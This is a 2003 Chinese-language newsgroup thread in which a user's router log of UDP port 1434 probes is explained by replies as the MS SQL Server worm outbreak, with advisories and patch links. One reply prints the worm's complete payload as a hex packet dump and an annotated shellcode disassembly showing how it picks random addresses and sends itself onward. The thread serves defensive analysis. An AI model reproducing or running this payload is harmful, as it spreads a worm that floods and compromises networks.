我被攻擊了! Attack on UPD Port 1434

29 views
Skip to first unread message

Morning Star

unread,
Jan 25, 2003, 3:04:29 AM1/25/03
to
我用Cable上網。今天晚上我上網的時候,突然發現很多網站都
連不上去。看了一下我的Cable Modem 和 router的燈號,發現一直
有人試著要連進我的ip address。我趕緊查了一下我的router紀錄
一看之下差點沒有昏倒。雖然我每天都會被一些Attacker掃瞄我的IP
但是我並沒有真正的被攻擊過。沒想到在一個半小時之內我的IP竟然
被超過100個不同的IP adress 試著要連上我的IP. 看來我是成了DOS攻擊的
目標了。害我幾乎沒有辦法連到Internet。不知道有沒有什麼辦法
可以防止被DOS攻擊的?
以下是我的router的紀錄:

1/25/2003 12:30:55 AM Unrecognized access from 130.235.133.23:2938 to
UDP port 1434
1/25/2003 12:31:19 AM Unrecognized access from 161.148.1.227:3924 to
UDP port 1434
1/25/2003 12:35:30 AM Unrecognized access from 66.220.10.146:5948 to
UDP port 1434
1/25/2003 12:35:42 AM Unrecognized access from 209.47.174.6:3229 to
UDP port 1434
1/25/2003 12:35:45 AM Unrecognized access from 128.255.40.92:1213 to
UDP port 1434
1/25/2003 12:36:39 AM Unrecognized access from 65.246.148.85:4866 to
UDP port 1434
1/25/2003 12:37:29 AM Unrecognized access from 203.134.105.240:4267 to
UDP port 1434
1/25/2003 12:38:08 AM Unrecognized access from 61.218.20.251:1037 to
UDP port 1434
1/25/2003 12:40:15 AM Unrecognized access from 210.82.215.82:3595 to
UDP port 1434
1/25/2003 12:40:24 AM Unrecognized access from 62.95.110.91:2934 to
UDP port 1434
1/25/2003 12:41:21 AM Unrecognized access from 129.59.218.33:1079 to
UDP port 1434
1/25/2003 12:42:18 AM Unrecognized access from 65.221.102.80:11790 to
UDP port 1434
1/25/2003 12:44:39 AM Unrecognized access from 65.121.123.1:4017 to
UDP port 1434
1/25/2003 12:44:49 AM Unrecognized access from 208.247.105.155:2380 to
UDP port 1434
1/25/2003 12:45:53 AM Unrecognized access from 64.35.160.134:1195 to
UDP port 1434
1/25/2003 12:49:19 AM Unrecognized access from 166.70.147.122:3553 to
UDP port 1434
1/25/2003 12:49:23 AM Unrecognized access from 63.251.136.48:1461 to
UDP port 1434
1/25/2003 12:50:28 AM Unrecognized access from 194.221.90.250:4176 to
UDP port 1434
1/25/2003 12:51:25 AM Unrecognized access from 209.186.12.6:3934 to
UDP port 1434
1/25/2003 12:52:29 AM Unrecognized access from 68.146.128.72:1657 to
TCP port 445
1/25/2003 12:52:32 AM Unrecognized access from 68.146.128.72:1657 to
TCP port 445
1/25/2003 12:53:17 AM Unrecognized access from 62.168.108.2:4015 to
UDP port 1434
1/25/2003 12:53:51 AM Unrecognized access from 149.222.137.203:1990 to
UDP port 1434
1/25/2003 12:53:51 AM Unrecognized access from 209.187.235.222:4177 to
UDP port 1434
1/25/2003 12:54:28 AM Unrecognized access from 62.149.225.102:3354 to
UDP port 1434
1/25/2003 12:54:31 AM Unrecognized access from 216.237.71.45:4910 to
UDP port 1434
1/25/2003 12:58:08 AM Unrecognized access from 194.94.75.136:4178 to
UDP port 1434
1/25/2003 1:01:21 AM Unrecognized access from 212.34.133.15:1313 to
UDP port 1434
1/25/2003 1:01:30 AM Unrecognized access from 24.167.81.78:3003 to TCP
port 27374
1/25/2003 1:01:33 AM Unrecognized access from 24.167.81.78:3003 to TCP
port 27374
1/25/2003 1:01:39 AM Unrecognized access from 24.167.81.78:3003 to TCP
port 27374
1/25/2003 1:03:20 AM Unrecognized access from 61.73.45.30:4600 to UDP
port 1434
1/25/2003 1:03:31 AM Unrecognized access from 66.128.96.8:3242 to UDP
port 1434
1/25/2003 1:06:06 AM Unrecognized access from 129.128.63.151:1045 to
UDP port 1434
1/25/2003 1:06:56 AM Unrecognized access from 216.131.95.231:1096 to
UDP port 1434
1/25/2003 1:07:34 AM Unrecognized access from 211.234.116.19:1788 to
UDP port 1434
1/25/2003 1:07:45 AM Unrecognized access from 130.85.105.204:3443 to
UDP port 1434
1/25/2003 1:08:55 AM Unrecognized access from 217.115.144.187:2779 to
UDP port 1434
1/25/2003 1:09:53 AM Unrecognized access from 203.146.117.169:2669 to
UDP port 1434
1/25/2003 1:10:04 AM Unrecognized access from 208.215.128.68:1276 to
UDP port 1434
1/25/2003 1:10:33 AM Unrecognized access from 129.11.206.91:1934 to
UDP port 1434
1/25/2003 1:11:29 AM Unrecognized access from 128.242.118.4:2315 to
UDP port 1434
1/25/2003 1:12:16 AM Unrecognized access from 194.221.105.205:3226 to
UDP port 1434
1/25/2003 1:14:24 AM Unrecognized access from 65.90.208.170:14901 to
UDP port 1434
1/25/2003 1:15:14 AM Unrecognized access from 212.20.149.79:3445 to
UDP port 1434
1/25/2003 1:15:19 AM Unrecognized access from 194.94.75.135:3991 to
UDP port 1434
1/25/2003 1:15:22 AM Unrecognized access from 66.180.251.41:7454 to
UDP port 1434
1/25/2003 1:17:17 AM Unrecognized access from 12.215.158.13:3067 to
UDP port 1434
1/25/2003 1:18:35 AM Unrecognized access from 216.81.223.80:4156 to
UDP port 1434
1/25/2003 1:19:10 AM Unrecognized access from 203.249.73.246:4455 to
UDP port 1434
1/25/2003 1:19:38 AM Unrecognized access from 194.243.134.158:1496 to
UDP port 1434
1/25/2003 1:19:52 AM Unrecognized access from 199.203.55.88:4719 to
UDP port 1434
1/25/2003 1:24:10 AM Unrecognized access from 207.46.200.167:2103 to
UDP port 1434
1/25/2003 1:24:35 AM Unrecognized access from 209.115.132.175:1642 to
UDP port 1434
1/25/2003 1:26:40 AM Unrecognized access from 198.82.94.85:2153 to UDP
port 1434
1/25/2003 1:26:53 AM Unrecognized access from 68.35.158.164:1825 to
TCP port 80
1/25/2003 1:26:57 AM Unrecognized access from 68.35.158.164:1825 to
TCP port 80
1/25/2003 1:30:24 AM Unrecognized access from 134.129.126.226:2820 to
UDP port 1434
1/25/2003 1:31:37 AM Unrecognized access from 24.159.31.102:4170 to
UDP port 1434
1/25/2003 1:31:48 AM Unrecognized access from 61.153.26.195:4162 to
UDP port 1434
1/25/2003 1:32:17 AM Unrecognized access from 211.155.1.70:1147 to UDP
port 1434
1/25/2003 1:33:18 AM Unrecognized access from 213.233.121.18:1846 to
UDP port 1434
1/25/2003 1:34:54 AM Unrecognized access from 211.138.164.134:3281 to
UDP port 1434
1/25/2003 1:36:56 AM Unrecognized access from 212.204.251.1:2155 to
UDP port 1434
1/25/2003 1:42:19 AM Unrecognized access from 129.89.70.241:2479 to
UDP port 1434
1/25/2003 1:43:30 AM Unrecognized access from 66.244.198.7:2937 to UDP
port 1434
1/25/2003 1:44:16 AM Unrecognized access from 128.171.10.189:1070 to
UDP port 1434
1/25/2003 1:45:03 AM Unrecognized access from 193.61.111.14:3613 to
UDP port 1434
1/25/2003 1:45:20 AM Unrecognized access from 161.28.110.122:1544 to
UDP port 1434
1/25/2003 1:45:26 AM Unrecognized access from 216.174.42.92:4412 to
UDP port 1434
1/25/2003 1:46:22 AM Unrecognized access from 209.185.130.71:3775 to
UDP port 1434
1/25/2003 1:47:04 AM Unrecognized access from 62.118.248.5:2321 to UDP
port 1434
1/25/2003 1:47:56 AM Unrecognized access from 194.183.5.210:1240 to
UDP port 1434
1/25/2003 1:49:50 AM Unrecognized access from 63.95.45.103:44927 to
UDP port 1434
1/25/2003 1:50:17 AM Unrecognized access from 207.61.242.67:2201 to
UDP port 1434
1/25/2003 1:51:11 AM Unrecognized access from 153.39.81.38:1992 to UDP
port 1434
1/25/2003 1:51:33 AM Unrecognized access from 218.108.107.103:3018 to
UDP port 1434
1/25/2003 1:53:11 AM Unrecognized access from 62.119.45.232:1248 to
UDP port 1434
1/25/2003 1:53:36 AM Unrecognized access from 63.127.10.22:3566 to UDP
port 1434
1/25/2003 1:54:06 AM Unrecognized access from 24.247.24.62:1212 to UDP
port 1434
1/25/2003 1:56:05 AM Unrecognized access from 217.89.41.130:49226 to
UDP port 1434
1/25/2003 1:57:18 AM Unrecognized access from 128.218.192.242:2984 to
UDP port 1434
1/25/2003 1:57:57 AM Unrecognized access from 140.142.157.156:3116 to
UDP port 1434
1/25/2003 1:58:45 AM Unrecognized access from 194.12.216.68:1275 to
UDP port 1434
1/25/2003 1:59:33 AM Unrecognized access from 141.161.2.32:1513 to UDP
port 1434
1/25/2003 1:59:38 AM Unrecognized access from 216.250.143.179:1984 to
UDP port 1434
1/25/2003 2:00:43 AM Unrecognized access from 134.95.128.116:3644 to
UDP port 1434
1/25/2003 2:02:20 AM Unrecognized access from 62.23.175.121:1956 to
UDP port 1434
1/25/2003 2:03:18 AM Unrecognized access from 208.138.159.119:3847 to
UDP port 1434
1/25/2003 2:04:52 AM Unrecognized access from 12.96.255.173:2487 to
UDP port 1434
1/25/2003 2:05:24 AM Unrecognized access from 61.15.42.38:1079 to UDP
port 1434
1/25/2003 2:05:52 AM Unrecognized access from 200.56.247.29:2520 to
UDP port 1434
1/25/2003 2:06:11 AM Unrecognized access from 210.94.24.135:4322 to
UDP port 1434
1/25/2003 2:06:28 AM Unrecognized access from 62.16.102.226:1035 to
UDP port 1434
1/25/2003 2:08:13 AM Unrecognized access from 218.55.120.236:3347 to
UDP port 1434
1/25/2003 2:08:15 AM Unrecognized access from 65.196.203.145:4974 to
UDP port 1434
1/25/2003 2:11:43 AM Unrecognized access from 170.94.250.56:2306 to
UDP port 1434
1/25/2003 2:11:59 AM Unrecognized access from 212.166.172.35:1491 to
UDP port 1434
1/25/2003 2:12:28 AM Unrecognized access from 213.4.106.104:4643 to
UDP port 1434
1/25/2003 2:20:02 AM Unrecognized access from 204.176.87.91:3816 to
UDP port 1434
1/25/2003 2:22:44 AM Unrecognized access from 66.230.215.240:1062 to
UDP port 1434
1/25/2003 2:30:39 AM Unrecognized access from 166.32.204.204:3062 to
UDP port 1434
1/25/2003 2:32:33 AM Unrecognized access from 66.115.191.227:2829 to
UDP port 1434
1/25/2003 2:34:27 AM Unrecognized access from 168.75.225.195:1395 to
UDP port 1434
1/25/2003 2:37:02 AM Unrecognized access from 216.205.68.132:1208 to
UDP port 1434
1/25/2003 2:37:24 AM Unrecognized access from 64.0.97.21:1974 to UDP
port 1434
1/25/2003 2:39:07 AM Unrecognized access from 212.34.133.15:1313 to
UDP port 1434
1/25/2003 2:39:09 AM Unrecognized access from 217.65.70.6:3260 to UDP
port 1434
1/25/2003 2:43:30 AM Unrecognized access from 137.203.190.40:4639 to
UDP port 1434
1/25/2003 2:48:14 AM Unrecognized access from 211.73.24.3:1123 to UDP
port 1434
1/25/2003 2:48:51 AM Unrecognized access from 209.164.24.173:3551 to
UDP port 1434
1/25/2003 2:50:23 AM Unrecognized access from 61.172.249.188:1346 to
UDP port 1434
1/25/2003 2:58:19 AM Unrecognized access from 12.3.200.57:3595 to UDP
port 1434
1/25/2003 2:58:28 AM Unrecognized access from 64.55.184.91:2130 to UDP
port 1434
1/25/2003 2:58:37 AM Unrecognized access from 193.88.50.7:3602 to UDP
port 1434
1/25/2003 2:59:47 AM Unrecognized access from 129.241.61.59:4084 to
UDP port 1434
1/25/2003 2:59:57 AM Unrecognized access from 203.245.160.14:1740 to
UDP port 1434
1/25/2003 3:01:55 AM Unrecognized access from 195.141.101.231:3645 to
UDP port 1434

我是男的= =

unread,
Jan 25, 2003, 8:51:59 AM1/25/03
to
被攻擊的並不是你 而是全國大部份的網路 是外國駭客攻擊
※ 引述《dma...@softhome.net (Morning Star)》之銘言:
--
[1;30;40m夫兵者不祥之器物或惡之故有道者不處君子居則貴左用兵則貴右兵者不祥之器非君子 [m
[1;30m之器不得已而用之恬淡為上勝而不美而美之者是樂殺人夫樂殺人者則不可得志於天下 [m
[1;30m矣吉事尚左凶事尚右偏將軍居左上將軍居右言以喪禮處之殺人 [37mwretch.twbbs.org [30m勝以 [m
[1;30m喪禮處之道常 [37m無名 [30m樸雖小天下莫能臣侯王若能守之萬物將自賓天地相合以降甘露民莫 [m
[1;30m之令而自均始制有名名亦既有夫亦將知止知止可以不殆譬道之在 [37m218.187.122.134 [30m海 [m

傲笑紅塵是主角

unread,
Jan 25, 2003, 10:34:47 AM1/25/03
to

http://www.cert.org.tw/news/030125.php

不是被攻擊,看這,最新的安全通告
--
[1;32m※ Origin: [33m交大資工鳳凰城資訊站 [37m<bbs.csie.nctu.edu.tw> [m
[1;31m◆ From: [36msw59-234-45.adsl.seed.net.tw [m

unread,
Jan 25, 2003, 10:32:01 AM1/25/03
to
==> dma0021. wrote:
> 我用Cable上網。今天晚上我上網的時候,突然發現很多網站都
> 連不上去。看了一下我的Cable Modem 和 router的燈號,發現一直
> 有人試著要連進我的ip address。我趕緊查了一下我的router紀錄
> 一看之下差點沒有昏倒。雖然我每天都會被一些Attacker掃瞄我的IP
> 但是我並沒有真正的被攻擊過。沒想到在一個半小時之內我的IP竟然
> 被超過100個不同的IP adress 試著要連上我的IP. 看來我是成了DOS攻擊的
> 目標了。害我幾乎沒有辦法連到Internet。不知道有沒有什麼辦法
> 可以防止被DOS攻擊的?

嗯...

發信人: "Jeremy Kister" <securityfo...@jeremykister.com>, 信區: bugtraq
標 題: Fw: MS SQL WORM IS DESTROYING INTERNET BLOCK PORT 1434!
發信站: "Jeremy Kister" (Sat Jan 25 17:20:07 2003)
轉信站: lls!main.gmane.org!not-for-mail
出 處: main.gmane.org

Some News: http://news.zdnet.co.uk/story/0,,t269-s2099780,00.html
Advisory: http://www.nextgenss.com/advisories/mssql-udp.txt
Microsoft Fix:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
bulletin/MS02-039.asp

MS SQL listens on port 1434/udp so that clients can figure out which method
of communication to use (named pipes, tcp/ip et al)
there are two problems that yield ability to execute code remotely while
unauthenticated.


--
[m [1;34m* Origin: LastLoveSongBBS (lls.twbbs.org) From: wireless.ap [m

吹向法國的風^^~(b)

unread,
Jan 25, 2003, 10:29:20 AM1/25/03
to
《 在 LHD...@wretch.csie.nctu.edu.tw (我是男的= =) 的大作中提到: 》
: 被攻擊的並不是你 而是全國大部份的網路 是外國駭客攻擊

是病毒啦...
又是微軟SQL的問題...
有興趣的可以參考下列網址

http://www.trend.com.tw/homepage/link.asp?loc=alert&URL=/vinfo/
http://slashdot.org/articles/03/01/25/1245206.shtml?tid=109

--
[m [1;36m※ 來源:‧蛋捲廣場 bbs.tku.edu.tw‧[FROM: 61.58.84.78] [m

Nanika

unread,
Jan 25, 2003, 2:38:44 PM1/25/03
to

Nanika:

注意防範SQL蠕蟲~~

受影響的軟體及系統﹕
====================
Microsoft SQL Server 2000 SP1
Microsoft SQL Server 2000 Desktop Engine
Microsoft SQL Server 2000
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 Server SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000

此SQL蠕蟲利用了~~
上一年發布的
Microsoft SQL Server 2000 Resolution服務遠程堆緩衝區溢出漏洞

漏洞詳細
http://www.nextgenss.com/advisories/mssql-udp.txt

蠕蟲攻擊方式
受到感染的主機會隨機發送大量封包~~~形成Udp Flood~~


修補程式下載
http://www.microsoft.com/Downloads/details.aspx?displaylang=en&FamilyID=DCFD
CBE9-B4EB-4446-9BE7-2DE45CFA6A89
or
http://www.digitaloffense.net/worms/mssql_udp_worm/Q323875_SQL2000_SP2_en.EX
E

蠕蟲分析

00000000 90 nop
00000001 90 nop
00000002 90 nop
00000003 90 nop
00000004 90 nop
00000005 90 nop
00000006 90 nop
00000007 90 nop
00000008 68DCC9B042 push dword 0x42b0c9dc
0000000D B801010101 mov eax,0x1010101
00000012 31C9 xor ecx,ecx
00000014 B118 mov cl,0x18
00000016 50 push eax
00000017 E2FD loop 0x16
00000019 3501010105 xor eax,0x5010101
0000001E 50 push eax
0000001F 89E5 mov ebp,esp
00000021 51 push ecx
00000022 682E646C6C push dword 0x6c6c642e
00000027 68656C3332 push dword 0x32336c65
0000002C 686B65726E push dword 0x6e72656b
00000031 51 push ecx
00000032 686F756E74 push dword 0x746e756f
00000037 6869636B43 push dword 0x436b6369
0000003C 6847657454 push dword 0x54746547
00000041 66B96C6C mov cx,0x6c6c
00000045 51 push ecx
00000046 6833322E64 push dword 0x642e3233
0000004B 687773325F push dword 0x5f327377
00000050 66B96574 mov cx,0x7465
00000054 51 push ecx
00000055 68736F636B push dword 0x6b636f73
0000005A 66B9746F mov cx,0x6f74
0000005E 51 push ecx
0000005F 6873656E64 push dword 0x646e6573
00000064 BE1810AE42 mov esi,0x42ae1018
00000069 8D45D4 lea eax,[ebp-0x2c]
0000006C 50 push eax
0000006D FF16 call near [esi]
0000006F 50 push eax
00000070 8D45E0 lea eax,[ebp-0x20]
00000073 50 push eax
00000074 8D45F0 lea eax,[ebp-0x10]
00000077 50 push eax
00000078 FF16 call near [esi]
0000007A 50 push eax
0000007B BE1010AE42 mov esi,0x42ae1010
00000080 8B1E mov ebx,[esi]
00000082 8B03 mov eax,[ebx]
00000084 3D558BEC51 cmp eax,0x51ec8b55
00000089 7405 jz 0x90
0000008B BE1C10AE42 mov esi,0x42ae101c
00000090 FF16 call near [esi]
00000092 FFD0 call eax
00000094 31C9 xor ecx,ecx
00000096 51 push ecx
00000097 51 push ecx
00000098 50 push eax
00000099 81F10301049B xor ecx,0x9b040103
0000009F 81F101010101 xor ecx,0x1010101
000000A5 51 push ecx
000000A6 8D45CC lea eax,[ebp-0x34]
000000A9 50 push eax
000000AA 8B45C0 mov eax,[ebp-0x40]
000000AD 50 push eax
000000AE FF16 call near [esi]
000000B0 6A11 push byte +0x11
000000B2 6A02 push byte +0x2
000000B4 6A02 push byte +0x2
000000B6 FFD0 call eax
000000B8 50 push eax
000000B9 8D45C4 lea eax,[ebp-0x3c]
000000BC 50 push eax
000000BD 8B45C0 mov eax,[ebp-0x40]
000000C0 50 push eax
000000C1 FF16 call near [esi]
000000C3 89C6 mov esi,eax
000000C5 09DB or ebx,ebx
000000C7 81F33C61D9FF xor ebx,0xffd9613c
000000CD 8B45B4 mov eax,[ebp-0x4c]
000000D0 8D0C40 lea ecx,[eax+eax*2]
000000D3 8D1488 lea edx,[eax+ecx*4]
000000D6 C1E204 shl edx,0x4
000000D9 01C2 add edx,eax
000000DB C1E208 shl edx,0x8
000000DE 29C2 sub edx,eax
000000E0 8D0490 lea eax,[eax+edx*4]
000000E3 01D8 add eax,ebx
000000E5 8945B4 mov [ebp-0x4c],eax
000000E8 6A10 push byte +0x10
000000EA 8D45B0 lea eax,[ebp-0x50]
000000ED 50 push eax
000000EE 31C9 xor ecx,ecx
000000F0 51 push ecx
000000F1 6681F17801 xor cx,0x178
000000F6 51 push ecx
000000F7 8D4503 lea eax,[ebp+0x3]
000000FA 50 push eax
000000FB 8B45AC mov eax,[ebp-0x54]
000000FE 50 push eax
000000FF FFD6 call esi
00000101 EBCA jmp short 0xcd

詳細過程
warning #1: i do not do much windows programming.
warning #2: i have not slept much lately.

this worm is completely contained inside its 376 byte payload;
i disassembled the code itself (search for "start here") after
the nops to find out what it does. there are some annotations;
most should make sense but feel free to let me know if i'm
way off.

the short story: it sends copies of itself to everyone.
it does not store anything on the file system or even change
anything directly. i do not know where the flaw in sqlserver
is, although it seems like this is pretty well known already
(for instance, there is a similar exploit at
http://www.ysgnet.com/hn/exploits/adv_win32_shellcode.txt)
shutting down sqlserver will completely stop this (although
you will still be vulnerable again, of course)

this was disassembled from www.boredom.org/~cstone/onepacket
which is a pcap capture of a single packet.

if you don't know how to work objdump, here's how:
objdump -s -m i386 -b binary -z --disassemble-all --start-address
0xc0 --show-raw-insn duh.pcap

--cst...@pobox.com

duh.pcap: file format binary

Contents of section .data:
0000 d4c3b2a1 02000400 00000000 00000000 埼瓷............
0010 88130000 01000000 0d40323e ff7b0200 .........@2>{..
0020 a2010000 a2010000 00e08121 e1660005 ?..?...?!塻..
0030 dd79e870 08004500 01943127 00007411 揫鋯..E...1'..t.
0040 53ce9320 8178d1a6 da240fb0 059a0180 S? .x悁?.?...
0050 65370401 01010101 01010101 01010101 e7..............
0060 01010101 01010101 01010101 01010101 ................
0070 01010101 01010101 01010101 01010101 ................
0080 01010101 01010101 01010101 01010101 ................
0090 01010101 01010101 01010101 01010101 ................
00a0 01010101 01010101 01010101 01010101 ................
00b0 010101dc c9b042eb 0e010101 01010101 ...剼蚪?.......
00c0 70ae4201 70ae4290 90909090 90909068 p唇.p唇........h
00d0 dcc9b042 b8010101 0131c9b1 1850e2fd 剼蚪?...1伀.P禔
00e0 35010101 055089e5 51682e64 6c6c6865 5....P.墥h.dllhe
00f0 6c333268 6b65726e 51686f75 6e746869 l32hkernQhounthi
0100 636b4368 47657454 66b96c6c 51683332 ckChGetTf雍lQh32
0110 2e646877 73325f66 b9657451 68736f63 .dhws2_f鈹tQhsoc
0120 6b66b974 6f516873 656e64be 1810ae42 kf靖oQhsend?.唇
0130 8d45d450 ff16508d 45e0508d 45f050ff .E偠.P.E詴.E癚
0140 1650be10 10ae428b 1e8b033d 558bec51 .P?.唇....=U.霋
0150 7405be1c 10ae42ff 16ffd031 c9515150 t.?.唇.?亓QP
0160 81f10301 049b81f1 01010101 518d45cc .?....?...Q.E? 0170 508b45c0
50ff166a 116a026a 02ffd050 P.E霏.j.j.j.羾
0180 8d45c450 8b45c050 ff1689c6 09db81f3 .E鵬.E霏..??? 0190 3c61d9ff
8b45b48d 0c408d14 88c1e204 <a?.E?.@...鎂.
01a0 01c2c1e2 0829c28d 049001d8 8945b46a .臏?)?...?E愕
01b0 108d45b0 5031c951 6681f178 01518d45 ..E訐1亓f.霥.Q.E
01c0 03508b45 ac50ffd6 ebca .P.E星絇?
Disassembly of section .data:

00000000 <.data>:
0: d4 c3 aam $0xffffffc3
2: b2 a1 mov $0xa1,%dl
4: 02 00 add (%eax),%al
6: 04 00 add $0x0,%al
8: 00 00 add %al,(%eax)
a: 00 00 add %al,(%eax)
c: 00 00 add %al,(%eax)
e: 00 00 add %al,(%eax)
10: 88 13 mov %dl,(%ebx)
12: 00 00 add %al,(%eax)
14: 01 00 add %eax,(%eax)
16: 00 00 add %al,(%eax)
18: 0d 40 32 3e ff or $0xff3e3240,%eax
1d: 7b 02 jnp 0x21
1f: 00 a2 01 00 00 a2 add %ah,0xa2000001(%edx)
25: 01 00 add %eax,(%eax)
27: 00 00 add %al,(%eax)
29: e0 81 loopne 0xffffffac
2b: 21 e1 and %esp,%ecx
2d: 66 data16
2e: 00 05 dd 79 e8 70 add %al,0x70e879dd
34: 08 00 or %al,(%eax)
36: 45 inc %ebp
37: 00 01 add %al,(%ecx)
39: 94 xchg %eax,%esp
3a: 31 27 xor %esp,(%edi)
3c: 00 00 add %al,(%eax)
3e: 74 11 je 0x51
40: 53 push %ebx
41: ce into
42: 93 xchg %eax,%ebx
43: 20 81 78 d1 a6 da and %al,0xdaa6d178(%ecx)
49: 24 0f and $0xf,%al
4b: b0 05 mov $0x5,%al
4d: 9a 01 80 65 37 04 01 lcall $0x104,$0x37658001
54: 01 01 add %eax,(%ecx)
56: 01 01 add %eax,(%ecx)
58: 01 01 add %eax,(%ecx)
5a: 01 01 add %eax,(%ecx)
5c: 01 01 add %eax,(%ecx)
5e: 01 01 add %eax,(%ecx)
60: 01 01 add %eax,(%ecx)
62: 01 01 add %eax,(%ecx)
64: 01 01 add %eax,(%ecx)
66: 01 01 add %eax,(%ecx)
68: 01 01 add %eax,(%ecx)
6a: 01 01 add %eax,(%ecx)
6c: 01 01 add %eax,(%ecx)
6e: 01 01 add %eax,(%ecx)
70: 01 01 add %eax,(%ecx)
72: 01 01 add %eax,(%ecx)
74: 01 01 add %eax,(%ecx)
76: 01 01 add %eax,(%ecx)
78: 01 01 add %eax,(%ecx)
7a: 01 01 add %eax,(%ecx)
7c: 01 01 add %eax,(%ecx)
7e: 01 01 add %eax,(%ecx)
80: 01 01 add %eax,(%ecx)
82: 01 01 add %eax,(%ecx)
84: 01 01 add %eax,(%ecx)
86: 01 01 add %eax,(%ecx)
88: 01 01 add %eax,(%ecx)
8a: 01 01 add %eax,(%ecx)
8c: 01 01 add %eax,(%ecx)
8e: 01 01 add %eax,(%ecx)
90: 01 01 add %eax,(%ecx)
92: 01 01 add %eax,(%ecx)
94: 01 01 add %eax,(%ecx)
96: 01 01 add %eax,(%ecx)
98: 01 01 add %eax,(%ecx)
9a: 01 01 add %eax,(%ecx)
9c: 01 01 add %eax,(%ecx)
9e: 01 01 add %eax,(%ecx)
a0: 01 01 add %eax,(%ecx)
a2: 01 01 add %eax,(%ecx)
a4: 01 01 add %eax,(%ecx)
a6: 01 01 add %eax,(%ecx)
a8: 01 01 add %eax,(%ecx)
aa: 01 01 add %eax,(%ecx)
ac: 01 01 add %eax,(%ecx)
ae: 01 01 add %eax,(%ecx)
b0: 01 01 add %eax,(%ecx)
b2: 01 dc add %ebx,%esp
b4: c9 leave
b5: b0 42 mov $0x42,%al
b7: eb 0e jmp 0xc7
b9: 01 01 add %eax,(%ecx)
bb: 01 01 add %eax,(%ecx)
bd: 01 01 add %eax,(%ecx)
bf: 01 70 ae add %esi,0xffffffae(%eax)
c2: 42 inc %edx
c3: 01 70 ae add %esi,0xffffffae(%eax)
c6: 42 inc %edx
c7: 90 nop
c8: 90 nop
c9: 90 nop
ca: 90 nop
cb: 90 nop
cc: 90 nop
cd: 90 nop


--- start here
ce: 90 nop
cf: 68 dc c9 b0 42 push $0x42b0c9dc
d4: b8 01 01 01 01 mov $0x1010101,%eax
d9: 31 c9 xor %ecx,%ecx
db: b1 18 mov $0x18,%cl
dd: 50 push %eax
de: e2 fd loop 0xdd
e1: 35 01 01 01 05 xor $0x5010101,%eax
e5: 50 push %eax
e6: 89 e5 mov %esp,%ebp
e8: 51 push %ecx

these push a mini-symbol table on the stack.
initially it looks something like this:
sendto00 cb
socket00 d3
ws2_32.d db
ll00GetT e3
ickCount eb
0000kern f3
el32.dll fb
00000004
^ ebp

e9: 68 2e 64 6c 6c push $0x6c6c642e
ee: 68 65 6c 33 32 push $0x32336c65
f3: 68 6b 65 72 6e push $0x6e72656b
f8: 51 push %ecx
f9: 68 6f 75 6e 74 push $0x746e756f
fe: 68 69 63 6b 43 push $0x436b6369
103: 68 47 65 74 54 push $0x54746547
108: 66 b9 6c 6c mov $0x6c6c,%cx
10c: 51 push %ecx
10d: 68 33 32 2e 64 push $0x642e3233
112: 68 77 73 32 5f push $0x5f327377
117: 66 b9 65 74 mov $0x7465,%cx
11b: 51 push %ecx
11c: 68 73 6f 63 6b push $0x6b636f73
121: 66 b9 74 6f mov $0x6f74,%cx
125: 51 push %ecx
126: 68 73 65 6e 64 push $0x646e6573
12b: be 18 10 ae 42 mov $0x42ae1018,%esi

# find sendto in ws2_32.dll
130: 8d 45 d4 lea 0xffffffd4(%ebp),%eax ## ws2_32.dll:sendto
133: 50 push %eax
134: ff 16 call *(%esi)
136: 50 push %eax # SND2
# find GetTickCount
137: 8d 45 e0 lea 0xffffffe0(%ebp),%eax ## GetTickCount
13a: 50 push %eax
13b: 8d 45 f0 lea 0xfffffff0(%ebp),%eax ## kernel32.dll
13e: 50 push %eax
13f: ff 16 call *(%esi)
141: 50 push %eax # GETT


# GetProcAddr apparently appears in different locations -- this one
# tries both
142: be 10 10 ae 42 mov $0x42ae1010,%esi # try 1 for GetProcAddress
147: 8b 1e mov (%esi),%ebx
149: 8b 03 mov (%ebx),%eax
14b: 3d 55 8b ec 51 cmp $0x51ec8b55,%eax # is this the right proc?
150: 74 05 je 0x157 # if we're ok then go ahead
152: be 1c 10 ae 42 mov $0x42ae101c,%esi # try 2 for GetProcAddress
157: ff 16 call *(%esi)

159: ff d0 call *%eax # call GetTickCount
15b: 31 c9 xor %ecx,%ecx
15d: 51 push %ecx #
15e: 51 push %ecx #
15f: 50 push %eax # push the tick count

# 0 ^ 0x9b040103 ^ 0x01010101 = 0x9a050002; this goes in
# little-endian; 0x59a is 1434, our port and 0002 is the family
# (AF_INET)
160: 81 f1 03 01 04 9b xor $0x9b040103,%ecx
166: 81 f1 01 01 01 01 xor $0x1010101,%ecx
16c: 51 push %ecx
16d: 8d 45 cc lea 0xffffffcc(%ebp),%eax # socket
170: 50 push %eax
171: 8b 45 c0 mov 0xffffffc0(%ebp),%eax # handle; SND2
174: 50 push %eax
175: ff 16 call *(%esi)

177: 6a 11 push $0x11 # protocol 17 - udp
179: 6a 02 push $0x2 # socket type SOCK_DGRAM
17b: 6a 02 push $0x2 # AF_INET
17d: ff d0 call *%eax # call socket
17f: 50 push %eax # push socket (SOCK) at ffffffb0(%ebp)
180: 8d 45 c4 lea 0xffffffc4(%ebp),%eax # get sendto addr
183: 50 push %eax
184: 8b 45 c0 mov 0xffffffc0(%ebp),%eax
187: 50 push %eax
188: ff 16 call *(%esi)


# it is almost ready to call sendto at this point -- however, GetTickCount
# was not sufficiently random enough for this guy, so he plays around
# with the address a bit before finally pushing it back into
0xffffffb4(%ebp)
# this mangling also ensures that it can loop without calling GetTickCount
# again, and get a different address.
# (although the quality of randomness is obviously in question here)
18a: 89 c6 mov %eax,%esi # move sendto addr
18c: 09 db or %ebx,%ebx # for mangling
18e: 81 f3 3c 61 d9 ff xor $0xffd9613c,%ebx

# start of the loop
194: 8b 45 b4 mov 0xffffffb4(%ebp),%eax # mov addr to eax
197: 8d 0c 40 lea (%eax,%eax,2),%ecx # mangle the address.
19a: 8d 14 88 lea (%eax,%ecx,4),%edx
19d: c1 e2 04 shl $0x4,%edx
1a0: 01 c2 add %eax,%edx
1a2: c1 e2 08 shl $0x8,%edx
1a5: 29 c2 sub %eax,%edx
1a7: 8d 04 90 lea (%eax,%edx,4),%eax
1aa: 01 d8 add %ebx,%eax # okay done mangling
